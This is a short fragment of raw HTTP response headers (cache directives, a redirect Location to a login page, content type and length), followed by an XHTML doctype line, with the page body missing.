Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://www.ss8.comlogin.php
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 16791
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">